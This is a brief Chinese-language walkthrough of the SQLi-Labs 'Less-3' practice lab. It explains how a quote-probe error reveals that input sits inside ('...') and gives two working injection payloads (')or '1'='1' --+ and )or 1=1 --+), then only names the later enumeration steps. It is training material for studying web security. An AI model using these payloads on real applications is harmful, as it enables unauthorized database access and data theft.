Less-3
根据提示传入参数id,数据类型为numeric
老样子,用单引号测试
报错的内容为:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
这意味着,它在后台的执行语句应该为
select a,b from table where id=('our input contents')
所以我们这里只需要变一个格式来做即可:
在源文件中的SQL执行语句
对于该语句可以成功注入的有:
')or '1'='1' --+
)or 1=1 --+
猜解字段
确定回显位
爆当前数据库名,数据库版本信息
其余的内容就不再多做介绍了!